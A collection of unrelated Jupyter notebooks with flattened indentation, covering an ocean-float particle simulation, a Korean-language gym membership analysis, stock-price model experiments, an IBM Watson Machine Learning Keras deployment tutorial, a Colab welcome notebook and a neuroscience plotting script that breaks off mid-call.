# Define the new Kernel that mimics Argo vertical movement
def ArgoVerticalMovement(particle, fieldset, time):
driftdepth = 1000 # maximum depth in m
maxdepth = 2000 # maximum depth in m
vertical_speed = 0.10 # sink and rise speed in m/s
cycletime = 10 * 86400 # total time of cycle in seconds
drifttime = 9 * 86400 # time of deep drift in seconds
if particle.cycle_phase == 0:
# Phase 0: Sinking with vertical_speed until depth is driftdepth
particle.depth += vertical_speed * particle.dt
if particle.depth >= driftdepth:
particle.cycle_phase = 1
elif particle.cycle_phase == 1:
# Phase 1: Drifting at depth for drifttime seconds
particle.drift_age += particle.dt
if particle.drift_age >= drifttime:
particle.drift_age = 0 # reset drift_age for next cycle
particle.cycle_phase = 2
elif particle.cycle_phase == 2:
# Phase 2: Sinking further to maxdepth
particle.depth += vertical_speed * particle.dt
if particle.depth >= maxdepth:
particle.cycle_phase = 3
elif particle.cycle_phase == 3:
# Phase 3: Rising with vertical_speed until at surface
particle.depth -= vertical_speed * particle.dt
#particle.temp = fieldset.temp[time, particle.depth, particle.lat, particle.lon] # if fieldset has temperature
if particle.depth <= fieldset.mindepth:
particle.depth = fieldset.mindepth
#particle.temp = 0./0. # reset temperature to NaN at end of sampling cycle
particle.cycle_phase = 4
elif particle.cycle_phase == 4:
# Phase 4: Transmitting at surface until cycletime is reached
if particle.cycle_age > cycletime:
particle.cycle_phase = 0
particle.cycle_age = 0
particle.cycle_age += particle.dt # update cycle_age
```
And then we can run Parcels with this 'custom kernel'.
Note that below we use the two-dimensional velocity fields of GlobCurrent, as these are provided as example_data with Parcels.
We therefore assume that the horizontal velocities are the same throughout the entire water column. However, the `ArgoVerticalMovement` kernel will work on any `FieldSet`, including from full three-dimensional hydrodynamic data.
If the hydrodynamic data also has a Temperature Field, then uncommenting the lines about temperature will also simulate the sampling of temperature.
```
from parcels import FieldSet, ParticleSet, JITParticle, AdvectionRK4, ErrorCode, Variable
from datetime import timedelta
import numpy as np
# Load the GlobCurrent data in the Agulhas region from the example_data
filenames = {'U': "GlobCurrent_example_data/20*.nc",
'V': "GlobCurrent_example_data/20*.nc"}
variables = {'U': 'eastward_eulerian_current_velocity',
'V': 'northward_eulerian_current_velocity'}
dimensions = {'lat': 'lat', 'lon': 'lon', 'time': 'time'}
fieldset = FieldSet.from_netcdf(filenames, variables, dimensions)
fieldset.mindepth = fieldset.U.depth[0] # uppermost layer in the hydrodynamic data
# Define a new Particle type including extra Variables
class ArgoParticle(JITParticle):
# Phase of cycle: init_descend=0, drift=1, profile_descend=2, profile_ascend=3, transmit=4
cycle_phase = Variable('cycle_phase', dtype=np.int32, initial=0.)
cycle_age = Variable('cycle_age', dtype=np.float32, initial=0.)
drift_age = Variable('drift_age', dtype=np.float32, initial=0.)
#temp = Variable('temp', dtype=np.float32, initial=np.nan) # if fieldset has temperature
# Initiate one Argo float in the Agulhas Current
pset = ParticleSet(fieldset=fieldset, pclass=ArgoParticle, lon=[32], lat=[-31], depth=[0])
# combine Argo vertical movement kernel with built-in Advection kernel
kernels = ArgoVerticalMovement + pset.Kernel(AdvectionRK4)
# Now execute the kernels for 30 days, saving data every 30 minutes
pset.execute(kernels, runtime=timedelta(days=30), dt=timedelta(minutes=5),
output_file=pset.ParticleFile(name="argo_float", outputdt=timedelta(minutes=30)))
```
Now we can plot the trajectory of the Argo float with some simple calls to netCDF4 and matplotlib
```
%matplotlib inline
import netCDF4
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
nc = netCDF4.Dataset("argo_float.nc")
x = nc.variables["lon"][:].squeeze()
y = nc.variables["lat"][:].squeeze()
z = nc.variables["z"][:].squeeze()
nc.close()
fig = plt.figure(figsize=(13,10))
ax = plt.axes(projection='3d')
cb = ax.scatter(x, y, z, c=z, s=20, marker="o")
ax.set_xlabel("Longitude")
ax.set_ylabel("Latitude")
ax.set_zlabel("Depth (m)")
ax.set_zlim(np.max(z),0)
plt.show()
```
|
github_jupyter
|
# 고객의 행동 분석/파악
* use_log.csv : 선테 이용 이력(2018년 4월 ~ 2019년 3월)
* customer_master.csv : 2019년 3월 말 회원 데이터(이전 탈퇴 회원 포함)
* class_master.csv : 회원 구분(종일, 주간, 야간)
* campaign_master.csv : 행사 구분(입회비 유무)
## 1. 데이터 확인
```
import pandas as pd
uselog = pd.read_csv('use_log.csv')
print(len(uselog))
uselog.head()
customer = pd.read_csv('customer_master.csv')
print(len(customer))
customer.head()
class_master = pd.read_csv('class_master.csv')
print(len(class_master))
class_master.head()
campaign_master = pd.read_csv('campaign_master.csv')
print(len(campaign_master))
campaign_master.head()
```
## 2. 고객 데이터 가공
```
customer_join = pd.merge(customer, class_master, on='class', how='left')
customer_join = pd.merge(customer_join, campaign_master, on='campaign_id', how='left')
customer_join.head()
customer_join.isnull().sum()
```
## 3. 고객 데이터 집계
```
customer_join.groupby('class_name').count()['customer_id']
customer_join.groupby('campaign_name').count()['customer_id']
customer_join.groupby('gender').count()['customer_id']
customer_join.groupby('is_deleted').count()['customer_id'] # 1 : 탈퇴
customer_join['start_date'] = pd.to_datetime(customer_join['start_date'])
customer_start = customer_join.loc[customer_join['start_date'] > pd.to_datetime('20180401')]
print(len(customer_start))
```
## 4. 최신 고객 데이터 집계
* 가장 최근 월의 고객만 추출
```
customer_join['end_date'] = pd.to_datetime(customer_join['end_date'])
customer_newer = customer_join.loc[(customer_join['end_date'] >= pd.to_datetime('20190331')) | \
(customer_join['end_date'].isna())]
print(len(customer_newer))
customer_newer['end_date'].unique()
customer_newer.groupby('class_name').count()['customer_id']
customer_newer.groupby('campaign_name').count()['customer_id']
customer_newer.groupby('gender').count()['customer_id']
```
## 5. 이용 이력 데이터 집계
* 월 이용 횟수의 평균값, 중앙값, 최댓값, 최솟값과 정기적 이용 여부를 고객 데이터에 추가
```
uselog['usedate'] = pd.to_datetime(uselog['usedate'])
uselog['연월'] = uselog['usedate'].dt.strftime('%Y%m')
uselog_months = uselog.groupby(['연월', 'customer_id'], as_index=False).count()
uselog_months.rename(columns={'log_id':'count'}, inplace=True)
del uselog_months['usedate']
uselog_months.head()
uselog_customer = uselog_months.groupby('customer_id').agg(['mean', 'median', 'max', 'min'])['count']
uselog_customer = uselog_customer.reset_index(drop=False)
uselog_customer.head()
```
## 6. 이용 이력 데이터로부터 정기 이용 여부 체크
* 월별 정기적 이용 여부는 고객마다 월/요일별 집계, 최대값이 4이상인 요일이 하나라도 있을 경우 1
```
uselog['weekday'] = uselog['usedate'].dt.weekday # 0 ~ 6 : 월요일 ~ 일요일
uselog_weekday = uselog.groupby(['customer_id', '연월', 'weekday'], as_index=False).count()[['customer_id',
'연월', 'weekday', 'log_id']]
uselog_weekday.rename(columns={'log_id':'count'}, inplace=True)
uselog_weekday.head()
uselog_weekday = uselog_weekday.groupby('customer_id', as_index=False).max()[['customer_id', 'count']]
uselog_weekday['routine_flg'] = 0
uselog_weekday['routine_flg'] = uselog_weekday['routine_flg'].where(uselog_weekday['count']<4, 1)
uselog_weekday.head()
```
## 7. 고객 데이터와 이용 애력 데이터를 결합
```
customer_join = pd.merge(customer_join, uselog_customer, on='customer_id', how='left')
customer_join = pd.merge(customer_join, uselog_weekday[['customer_id', 'routine_flg']], on='customer_id', how='left')
customer_join.head()
customer_join.isnull().sum()
```
## 8. 회원 기간 계산
* 기본 계산 : start_date와 end_date의 차이
* 탈퇴하지 않은 회원은 end_date가 결측치이므로 임의로 2019년 4월 30일로 해서 3월 31일에 탈퇴한 사람과 차이를 둔다.
```
from dateutil.relativedelta import relativedelta
customer_join['calc_date'] = customer_join['end_date']
customer_join['calc_date'] = customer_join['calc_date'].fillna(pd.to_datetime('20190430'))
customer_join['membership_period'] = 0
for i in range(len(customer_join)):
delta = relativedelta(customer_join['calc_date'].iloc[i], customer_join['start_date'].iloc[i])
customer_join['membership_period'].iloc[i] = delta.years*12 + delta.months
customer_join.head()
```
## 9. 통계량 파악
```
customer_join[['mean', 'median', 'max', 'min']].describe()
customer_join.groupby('routine_flg').count()['customer_id']
import matplotlib.pyplot as plt
%matplotlib inline
plt.hist(customer_join['membership_period'])
```
## 10. 탈퇴 회원과 지속 회의의 차이 파악
```
customer_end = customer_join.loc[customer_join['is_deleted']==1]
customer_end.describe()
customer_stay = customer_join.loc[customer_join['is_deleted']==0]
customer_stay.describe()
```
|
github_jupyter
|
```
from database.market import Market
from database.strategy import Strategy
from extractor.tiingo_extractor import TiingoExtractor
from preprocessor.model_preprocessor import ModelPreprocessor
from preprocessor.predictor_preprocessor import PredictorPreprocessor
from modeler.modeler import Modeler
from datetime import datetime, timedelta
from tqdm import tqdm
import pandas as pd
import pickle
import tensorflow as tf
import warnings
warnings.simplefilter(action='ignore', category=Warning)
from modeler.modeler import Modeler
market = Market()
strat= Strategy("aggregate")
## Loading Constants
market.connect()
tickers = market.retrieve_data("sp500")
market.close()
years = 10
end = datetime.now()
start = datetime.now() - timedelta(days=365.25*years)
market.connect()
test = market.retrieve_data("dataset_regression")
market.close()
test
ticker = "AAPL"
m = Modeler(ticker)
data = test.copy()
data["y"] = data[ticker]
features = data.drop(["date","y","_id"],axis=1)
for column in tqdm(features.columns):
for i in range(14):
features["ticker_{}_{}".format(column,i)] = features[column].shift(i)
features = features[14:]
for i in range(14):
data["y_{}".format(i)] = data["y"].shift(i)
data = data[14:]
new_labels = []
for i in range(len(data["y"])):
row = data.iloc[i]
new_labels.append(row[[x for x in data.columns if "y_" in x]].values)
# new = []
# for column in tqdm([x for x in features.columns if "_" not in x]):
# new_row = []
# for i in range(1,360):
# row = features.iloc[i]
# new_row.append(row[[x for x in features.columns if ("ticker_" + column + "_") in x]].values)
# new.append(new_row)
features
predictions = []
for i in tqdm(range(14)):
results = pd.DataFrame(m.sk_model({"X":features[i:],"y":data["y"].shift(i)[i:]}))
prediction = results.sort_values("score",ascending=False).iloc[0]["model"].predict(features[-14:])
predictions.append(prediction[len(prediction)-1])
import matplotlib.pyplot as plt
stuff = data[-14:]
stuff["predict"] = predictions
plt.plot(stuff["y"])
plt.plot(stuff["predict"])
plt.show()
features[-14:]
stuff
m = tf.keras.models.Sequential([
tf.keras.layers.Dense(units=64,activation="relu"),
tf.keras.layers.Dense(units=64,activation="relu"),
tf.keras.layers.Dense(units=1)
])
m.compile(loss=tf.losses.MeanSquaredError(),metrics=[tf.metrics.mean_squared_error])
predictions = []
for i in range(14):
m.fit(tf.stack(features[i:]),tf.stack(data["y"].shift(i)[i:]))
prediction = m.predict(tf.stack(features))
predictions.append(prediction[0])
import matplotlib.pyplot as plt
stuff = data[-14:]
stuff["predict"] = predictions
plt.plot(stuff["y"])
plt.plot(stuff["predict"])
plt.show()
days = 100
end = datetime(2020,7,1)
start = end - timedelta(days=days)
base = pd.date_range(start,end)
gap = 2
rows = []
training_days = 100
strat.connect()
for date in tqdm(base):
if date.weekday() < 5:
training_start = date - timedelta(days=training_days)
training_end = date
if date.weekday() == 4:
prediction_date = date + timedelta(days=3)
else:
prediction_date = date + timedelta(days=1)
classification = strat.retrieve_training_data("dataset_classification",training_start,prediction_date)
classification_prediction = pd.DataFrame([classification.drop(["Date","_id"],axis=1).iloc[len(classification["Date"])-1]])
if len(classification) > 60 and len(classification_prediction) > 0:
for i in range(46,47):
try:
ticker = tickers.iloc[i]["Symbol"]
if ticker in classification.columns:
sector = tickers.iloc[i]["GICS Sector"]
sub_sector = tickers.iloc[i]["GICS Sub Industry"]
cik = int(tickers.iloc[i]["CIK"].item())
classification_data = classification.copy()
classification_data["y"] = classification_data[ticker]
classification_data["y"] = classification_data["y"].shift(-gap)
classification_data = classification_data[:-gap]
mt = ModelPreprocessor(ticker)
rc = mt.day_trade_preprocess_classify(classification_data.copy(),ticker)
sp = Modeler(ticker)
results_rc = sp.classify_tf(rc)
results = pd.DataFrame([results_rc])
model = results.sort_values("accuracy",ascending=False).iloc[0]
m = model["model"]
mr = PredictorPreprocessor(ticker)
refined = mr.preprocess_classify(classification_prediction.copy())
cleaned = classification_prediction
factors = refined["X"]
prediction = [x[0] for x in m.predict(factors)]
product = market.retrieve_price_data("prices",ticker)
product["Date"] = [datetime.strptime(x,"%Y-%m-%d") for x in product["Date"]]
product = product[(product["Date"] > training_end) & (product["Date"] <= prediction_date)]
product["predicted"] = prediction
product["predicted"] = [1 if x > 0 else 0 for x in product["predicted"]]
product["accuracy"] = model["accuracy"]
product.sort_values("Date",inplace=True)
product = product[["Date","Adj_Close","predicted","accuracy","ticker"]].dropna()
strat.store_data("sim_tf",product)
except Exception as e:
print(str(e))
strat.close()
```
|
github_jupyter
|
# Use Keras to recognize hand-written digits with `ibm-watson-machine-learning`
This notebook uses the Keras machine learning framework with the Watson Machine Learning service. It contains steps and code to work with [ibm-watson-machine-learning](https://pypi.python.org/pypi/ibm-watson-machine-learning) library available in PyPI repository. It also introduces commands for getting model and training data, persisting model, deploying model and scoring it.
Some familiarity with Python is helpful. This notebook uses Python 3.8.
## Learning goals
The learning goals of this notebook are:
- Download an externally trained Keras model with dataset.
- Persist an external model in Watson Machine Learning repository.
- Deploy model for online scoring using client library.
- Score sample records using client library.
## Contents
This notebook contains the following parts:
1. [Setup](#setup)
2. [Download externally created Keras model and data](#download)
3. [Persist externally created Keras model](#upload)
4. [Deploy and score in a Cloud](#deploy)
5. [Clean up](#cleanup)
6. [Summary and next steps](#summary)
<a id="setup"></a>
## 1. Set up the environment
Before you use the sample code in this notebook, you must perform the following setup tasks:
- Create a <a href="https://console.ng.bluemix.net/catalog/services/ibm-watson-machine-learning/" target="_blank" rel="noopener no referrer">Watson Machine Learning (WML) Service</a> instance (a free plan is offered and information about how to create the instance can be found <a href="https://dataplatform.cloud.ibm.com/docs/content/wsj/analyze-data/ml-service-instance.html?context=analytics" target="_blank" rel="noopener no referrer">here</a>).
### Connection to WML
Authenticate the Watson Machine Learning service on IBM Cloud. You need to provide platform `api_key` and instance `location`.
You can use [IBM Cloud CLI](https://cloud.ibm.com/docs/cli/index.html) to retrieve platform API Key and instance location.
API Key can be generated in the following way:
```
ibmcloud login
ibmcloud iam api-key-create API_KEY_NAME
```
In result, get the value of `api_key` from the output.
Location of your WML instance can be retrieved in the following way:
```
ibmcloud login --apikey API_KEY -a https://cloud.ibm.com
ibmcloud resource service-instance WML_INSTANCE_NAME
```
In result, get the value of `location` from the output.
**Tip**: Your `Cloud API key` can be generated by going to the [**Users** section of the Cloud console](https://cloud.ibm.com/iam#/users). From that page, click your name, scroll down to the **API Keys** section, and click **Create an IBM Cloud API key**. Give your key a name and click **Create**, then copy the created key and paste it below. You can also get a service specific url by going to the [**Endpoint URLs** section of the Watson Machine Learning docs](https://cloud.ibm.com/apidocs/machine-learning). You can check your instance location in your <a href="https://console.ng.bluemix.net/catalog/services/ibm-watson-machine-learning/" target="_blank" rel="noopener no referrer">Watson Machine Learning (WML) Service</a> instance details.
You can also get service specific apikey by going to the [**Service IDs** section of the Cloud Console](https://cloud.ibm.com/iam/serviceids). From that page, click **Create**, then copy the created key and paste it below.
**Action**: Enter your `api_key` and `location` in the following cell.
```
api_key = 'PASTE YOUR PLATFORM API KEY HERE'
location = 'PASTE YOUR INSTANCE LOCATION HERE'
wml_credentials = {
"apikey": api_key,
"url": 'https://' + location + '.ml.cloud.ibm.com'
}
```
### Install and import the `ibm-watson-machine-learning` package
**Note:** `ibm-watson-machine-learning` documentation can be found <a href="http://ibm-wml-api-pyclient.mybluemix.net/" target="_blank" rel="noopener no referrer">here</a>.
```
!pip install -U ibm-watson-machine-learning
from ibm_watson_machine_learning import APIClient
client = APIClient(wml_credentials)
```
### Working with spaces
First of all, you need to create a space that will be used for your work. If you do not have space already created, you can use [Deployment Spaces Dashboard](https://dataplatform.cloud.ibm.com/ml-runtime/spaces?context=cpdaas) to create one.
- Click New Deployment Space
- Create an empty space
- Select Cloud Object Storage
- Select Watson Machine Learning instance and press Create
- Copy `space_id` and paste it below
**Tip**: You can also use SDK to prepare the space for your work. More information can be found [here](https://github.com/IBM/watson-machine-learning-samples/blob/master/cloud/notebooks/python_sdk/instance-management/Space%20management.ipynb).
**Action**: Assign space ID below
```
space_id = 'PASTE YOUR SPACE ID HERE'
```
You can use `list` method to print all existing spaces.
```
client.spaces.list(limit=10)
```
To be able to interact with all resources available in Watson Machine Learning, you need to set **space** which you will be using.
```
client.set.default_space(space_id)
```
<a id="download"></a>
## 2. Download externally created Keras model and data
In this section, you will download externally created Keras models and data used for training it.
```
import os
import wget
data_dir = 'MNIST_DATA'
if not os.path.isdir(data_dir):
os.mkdir(data_dir)
model_path = os.path.join(data_dir, 'mnist_keras.h5.tgz')
if not os.path.isfile(model_path):
wget.download("https://github.com/IBM/watson-machine-learning-samples/raw/master/cloud/models/keras/mnist_keras.h5.tgz", out=data_dir)
import os
import wget
data_dir = 'MNIST_DATA'
if not os.path.isdir(data_dir):
os.mkdir(data_dir)
filename = os.path.join(data_dir, 'mnist.npz')
if not os.path.isfile(filename):
wget.download('https://s3.amazonaws.com/img-datasets/mnist.npz', out=data_dir)
import numpy as np
dataset = np.load(filename)
x_test = dataset['x_test']
```
<a id="upload"></a>
## 3. Persist externally created Keras model
In this section, you will learn how to store your model in Watson Machine Learning repository by using the Watson Machine Learning Client.
### 3.1: Publish model
#### Publish model in Watson Machine Learning repository on Cloud.
Define model name, type and software specification needed to deploy model later.
```
sofware_spec_uid = client.software_specifications.get_id_by_name("default_py3.8")
metadata = {
client.repository.ModelMetaNames.NAME: 'External Keras model',
client.repository.ModelMetaNames.TYPE: 'tensorflow_2.4',
client.repository.ModelMetaNames.SOFTWARE_SPEC_UID: sofware_spec_uid
}
published_model = client.repository.store_model(
model=model_path,
meta_props=metadata)
```
### 3.2: Get model details
```
import json
published_model_uid = client.repository.get_model_uid(published_model)
model_details = client.repository.get_details(published_model_uid)
print(json.dumps(model_details, indent=2))
```
### 3.3 Get all models
```
models_details = client.repository.list_models()
```
<a id="deploy"></a>
## 4. Deploy and score in a Cloud
In this section you will learn how to create online scoring and to score a new data record by using the Watson Machine Learning Client.
### 4.1: Create model deployment
#### Create online deployment for published model
```
metadata = {
client.deployments.ConfigurationMetaNames.NAME: "Deployment of external Keras model",
client.deployments.ConfigurationMetaNames.ONLINE: {}
}
created_deployment = client.deployments.create(published_model_uid, meta_props=metadata)
```
**Note**: Here we use deployment url saved in published_model object. In next section, we show how to retrive deployment url from Watson Machine Learning instance.
```
deployment_uid = client.deployments.get_uid(created_deployment)
```
Now you can print an online scoring endpoint.
```
scoring_endpoint = client.deployments.get_scoring_href(created_deployment)
print(scoring_endpoint)
```
You can also list existing deployments.
```
client.deployments.list()
```
### 4.2: Get deployment details
```
client.deployments.get_details(deployment_uid)
```
<a id="score"></a>
### 4.3: Score
You can use below method to do test scoring request against deployed model.
Let's first visualize two samples from dataset, we'll use for scoring.
```
%matplotlib inline
import matplotlib.pyplot as plt
for i, image in enumerate([x_test[0], x_test[1]]):
plt.subplot(2, 2, i + 1)
plt.axis('off')
plt.imshow(image, cmap=plt.cm.gray_r, interpolation='nearest')
```
Prepare scoring payload with records to score.
```
score_0 = (x_test[0].ravel() / 255).tolist()
score_1 = (x_test[1].ravel() / 255).tolist()
scoring_payload = {"input_data": [{"values": [score_0, score_1]}]}
```
Use ``client.deployments.score()`` method to run scoring.
```
predictions = client.deployments.score(deployment_uid, scoring_payload)
print(json.dumps(predictions, indent=2))
```
<a id="cleanup"></a>
## 5. Clean up
If you want to clean up all created assets:
- experiments
- trainings
- pipelines
- model definitions
- models
- functions
- deployments
please follow up this sample [notebook](https://github.com/IBM/watson-machine-learning-samples/blob/master/cloud/notebooks/python_sdk/instance-management/Machine%20Learning%20artifacts%20management.ipynb).
<a id="summary"></a>
## 6. Summary and next steps
You successfully completed this notebook! You learned how to use Keras machine learning library as well as Watson Machine Learning for model creation and deployment. Check out our _[Online Documentation](https://dataplatform.cloud.ibm.com/docs/content/wsj/getting-started/welcome-main.html?context=analytics?pos=2)_ for more samples, tutorials, documentation, how-tos, and blog posts.
### Authors
**Daniel Ryszka**, Software Engineer
Copyright © 2020, 2021 IBM. This notebook and its source code are released under the terms of the MIT License.
|
github_jupyter
|
<a href="https://colab.research.google.com/github/katie-chiang/ARMultiDoodle/blob/master/Copy_of_Welcome_To_Colaboratory.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
<p><img alt="Colaboratory logo" height="45px" src="/img/colab_favicon.ico" align="left" hspace="10px" vspace="0px"></p>
<h1>What is Colaboratory?</h1>
Colaboratory, or "Colab" for short, allows you to write and execute Python in your browser, with
- Zero configuration required
- Free access to GPUs
- Easy sharing
Whether you're a **student**, a **data scientist** or an **AI researcher**, Colab can make your work easier. Watch [Introduction to Colab](https://www.youtube.com/watch?v=inN8seMm7UI) to learn more, or just get started below!
## **Getting started**
The document you are reading is not a static web page, but an interactive environment called a **Colab notebook** that lets you write and execute code.
For example, here is a **code cell** with a short Python script that computes a value, stores it in a variable, and prints the result:
```
seconds_in_a_day = 24 * 60 * 60
seconds_in_a_day
hello
# test screeeeem
```
To execute the code in the above cell, select it with a click and then either press the play button to the left of the code, or use the keyboard shortcut "Command/Ctrl+Enter". To edit the code, just click the cell and start editing.
Variables that you define in one cell can later be used in other cells:
```
seconds_in_a_week = 7 * seconds_in_a_day
seconds_in_a_week
🤣🤣🤣😂😎😎🙄😫😫
ug
katie
max
```
Colab notebooks allow you to combine **executable code** and **rich text** in a single document, along with **images**, **HTML**, **LaTeX** and more. When you create your own Colab notebooks, they are stored in your Google Drive account. You can easily share your Colab notebooks with co-workers or friends, allowing them to comment on your notebooks or even edit them. To learn more, see [Overview of Colab](/notebooks/basic_features_overview.ipynb). To create a new Colab notebook you can use the File menu above, or use the following link: [create a new Colab notebook](http://colab.research.google.com#create=true).
Colab notebooks are Jupyter notebooks that are hosted by Colab. To learn more about the Jupyter project, see [jupyter.org](https://www.jupyter.org).
## Data science
With Colab you can harness the full power of popular Python libraries to analyze and visualize data. The code cell below uses **numpy** to generate some random data, and uses **matplotlib** to visualize it. To edit the code, just click the cell and start editing.
```
import numpy as np
from matplotlib import pyplot as plt
ys = 200 + np.random.randn(100)
x = [x for x in range(len(ys))]
plt.plot(x, ys, '-')
plt.fill_between(x, ys, 195, where=(ys > 195), facecolor='g', alpha=0.6)
plt.title("Sample Visualization")
plt.show()
```
You can import your own data into Colab notebooks from your Google Drive account, including from spreadsheets, as well as from Github and many other sources. To learn more about importing data, and how Colab can be used for data science, see the links below under [Working with Data](#working-with-data).
## Machine learning
With Colab you can import an image dataset, train an image classifier on it, and evaluate the model, all in just [a few lines of code](https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/quickstart/beginner.ipynb). Colab notebooks execute code on Google's cloud servers, meaning you can leverage the power of Google hardware, including [GPUs and TPUs](#using-accelerated-hardware), regardless of the power of your machine. All you need is a browser.
Colab is used extensively in the machine learning community with applications including:
- Getting started with TensorFlow
- Developing and training neural networks
- Experimenting with TPUs
- Disseminating AI research
- Creating tutorials
To see sample Colab notebooks that demonstrate machine learning applications, see the [machine learning examples](#machine-learning-examples) below.
## More Resources
### Working with Notebooks in Colab
- [Overview of Colaboratory](/notebooks/basic_features_overview.ipynb)
- [Guide to Markdown](/notebooks/markdown_guide.ipynb)
- [Importing libraries and installing dependencies](/notebooks/snippets/importing_libraries.ipynb)
- [Saving and loading notebooks in GitHub](https://colab.research.google.com/github/googlecolab/colabtools/blob/master/notebooks/colab-github-demo.ipynb)
- [Interactive forms](/notebooks/forms.ipynb)
- [Interactive widgets](/notebooks/widgets.ipynb)
- <img src="/img/new.png" height="20px" align="left" hspace="4px" alt="New"></img>
[TensorFlow 2 in Colab](/notebooks/tensorflow_version.ipynb)
<a name="working-with-data"></a>
### Working with Data
- [Loading data: Drive, Sheets, and Google Cloud Storage](/notebooks/io.ipynb)
- [Charts: visualizing data](/notebooks/charts.ipynb)
- [Getting started with BigQuery](/notebooks/bigquery.ipynb)
### Machine Learning Crash Course
These are a few of the notebooks from Google's online Machine Learning course. See the [full course website](https://developers.google.com/machine-learning/crash-course/) for more.
- [Intro to Pandas](/notebooks/mlcc/intro_to_pandas.ipynb)
- [Tensorflow concepts](/notebooks/mlcc/tensorflow_programming_concepts.ipynb)
- [First steps with TensorFlow](/notebooks/mlcc/first_steps_with_tensor_flow.ipynb)
- [Intro to neural nets](/notebooks/mlcc/intro_to_neural_nets.ipynb)
- [Intro to sparse data and embeddings](/notebooks/mlcc/intro_to_sparse_data_and_embeddings.ipynb)
<a name="using-accelerated-hardware"></a>
### Using Accelerated Hardware
- [TensorFlow with GPUs](/notebooks/gpu.ipynb)
- [TensorFlow with TPUs](/notebooks/tpu.ipynb)
<a name="machine-learning-examples"></a>
## Machine Learning Examples
To see end-to-end examples of the interactive machine learning analyses that Colaboratory makes possible, check out these tutorials using models from [TensorFlow Hub](https://tfhub.dev).
A few featured examples:
- [Retraining an Image Classifier](https://tensorflow.org/hub/tutorials/tf2_image_retraining): Build a Keras model on top of a pre-trained image classifier to distinguish flowers.
- [Text Classification](https://tensorflow.org/hub/tutorials/tf2_text_classification): Classify IMDB movie reviews as either *positive* or *negative*.
- [Style Transfer](https://tensorflow.org/hub/tutorials/tf2_arbitrary_image_stylization): Use deep learning to transfer style between images.
- [Multilingual Universal Sentence Encoder Q&A](https://tensorflow.org/hub/tutorials/retrieval_with_tf_hub_universal_encoder_qa): Use a machine learning model to answer questions from the SQuAD dataset.
- [Video Interpolation](https://tensorflow.org/hub/tutorials/tweening_conv3d): Predict what happened in a video between the first and the last frame.
|
github_jupyter
|
```
import random
import copy
import logging
import sys
from run_tests_201204 import *
import os
import sys
import importlib
from collections import defaultdict
sys.path.insert(0, '/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc')
from tools_pattern import get_eucledean_dist
import compress_pickle
import my_plot
from my_plot import MyPlotData, my_box_plot
import seaborn as sns
script_n = 'plot_210413_across_masked_noise'
data_script = 'batch_210414_across_masked_noise'
db_path = '/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc/dimensionality_sim/' \
f'{data_script}/'
scaled_noise = 1
core_noise = 0
n_mfs = 400
n_grcs = 2400
signal_ratio = .5
signal_type = 'random'
db = {}
model = 'scaleup4'
db[model] = compress_pickle.load(
db_path+f'{data_script}_{model}_{n_grcs}_{n_mfs}_signal_ratio_{signal_ratio}_signal_type_{signal_type}_0.3_512_10.gz')
model = 'random'
db[model] = compress_pickle.load(
db_path+f'{data_script}_{model}_{n_grcs}_{n_mfs}_signal_ratio_{signal_ratio}_signal_type_{signal_type}_0.3_512_10.gz')
model = 'naive_random4'
db[model] = compress_pickle.load(
db_path+f'{data_script}_{model}_{n_grcs}_{n_mfs}_signal_ratio_{signal_ratio}_signal_type_{signal_type}_0.3_512_10.gz')
avg_grc_dim_list = defaultdict(list)
for ress in db['random']:
ress_tries = ress
for ress in ress_tries:
# print(ress)
for noise in ress:
res = ress[noise]
grc_dim = res['grc_dim']
avg_grc_dim_list[noise].append(grc_dim)
avg_grc_dim = {}
for noise in avg_grc_dim_list:
avg_grc_dim[noise] = sum(avg_grc_dim_list[noise])/len(avg_grc_dim_list[noise])
avg_grc_dim_list = defaultdict(list)
for ress in db['naive_random4']:
ress_tries = ress
for ress in ress_tries:
# print(ress)
for noise in ress:
res = ress[noise]
grc_dim = res['grc_dim']
avg_grc_dim_list[noise].append(grc_dim)
avg_grc_dim2 = {}
for noise in avg_grc_dim_list:
avg_grc_dim2[noise] = sum(avg_grc_dim_list[noise])/len(avg_grc_dim_list[noise])
name_map = {
'scaleup4': "Observed",
'global_random': "Global Random",
'random': "Global Random",
# 'naive_random_17': "Local Random",
'naive_random4': "Local Random",
}
palette = {
name_map['scaleup4']: sns.color_palette()[0],
name_map['global_random']: sns.color_palette()[1],
name_map['random']: sns.color_palette()[1],
name_map['naive_random4']: sns.color_palette()[2],
# name_map['naive_random_21']: sns.color_palette()[2],
}
mpd = MyPlotData()
ress_ref = db['naive_random4'][0][0]
resss_ref2 = db['naive_random4'][0]
for model_name in [
# 'global_random',
# 'naive_random_17',
'random',
'naive_random4',
'scaleup4',
]:
ress = db[model_name]
# print(ress)
ress_tries = ress[0] # get the first element in tuple
# ress = ress[0] # get the first try
for n_try, ress in enumerate(ress_tries):
# print(resss_ref2[0])
# print(resss_ref2.keys())
if n_try >= len(resss_ref2):
print(n_try)
continue
ress_ref2 = resss_ref2[n_try]
for noise in ress:
# print(noise)
res = ress[noise]
# res_ref = ress_ref[noise]
res_ref2 = ress_ref2[noise]
# hamming_distance_norm = res['hamming_distance']/res['num_grcs']
mpd.add_data_point(
model=name_map[model_name],
noise=noise*100,
grc_dim=res['grc_dim'],
grc_dim_norm=res['grc_dim']/res_ref2['grc_dim'],
grc_dim_norm2=res['grc_dim']/avg_grc_dim[noise],
grc_dim_norm3=res['grc_dim']/avg_grc_dim2[noise],
grc_by_mf_dim=res['grc_dim']/res['mf_dim'],
# grc_by_mf_dim_ref=res['grc_dim']/res_ref['mf_dim'],
num_grcs=res['num_grcs'],
num_mfs=res['num_mfs'],
voi=res['voi'],
grc_pop_corr=res['grc_pop_corr'],
grc_pop_corr_norm=res['grc_pop_corr']/res_ref2['grc_pop_corr'],
binary_similarity=res['binary_similarity'],
hamming_distance=res['hamming_distance'],
normalized_mse=res['normalized_mse'],
)
# importlib.reload(my_plot); my_plot.my_relplot(
# mpd,
# x='noise',
# y='grc_dim',
# hue='model',
# context='paper',
# palette=palette,
# linewidth=1,
# log_scale_y=True,
# width=10,
# # ylim=[0, None],
# y_axis_label='Dim. Expansion ($x$)',
# x_axis_label='MF Input Variation (%)',
# title='noise',
# save_filename=f'{script_n}_act_30.svg',
# show=True,
# )
importlib.reload(my_plot); my_plot.my_relplot(
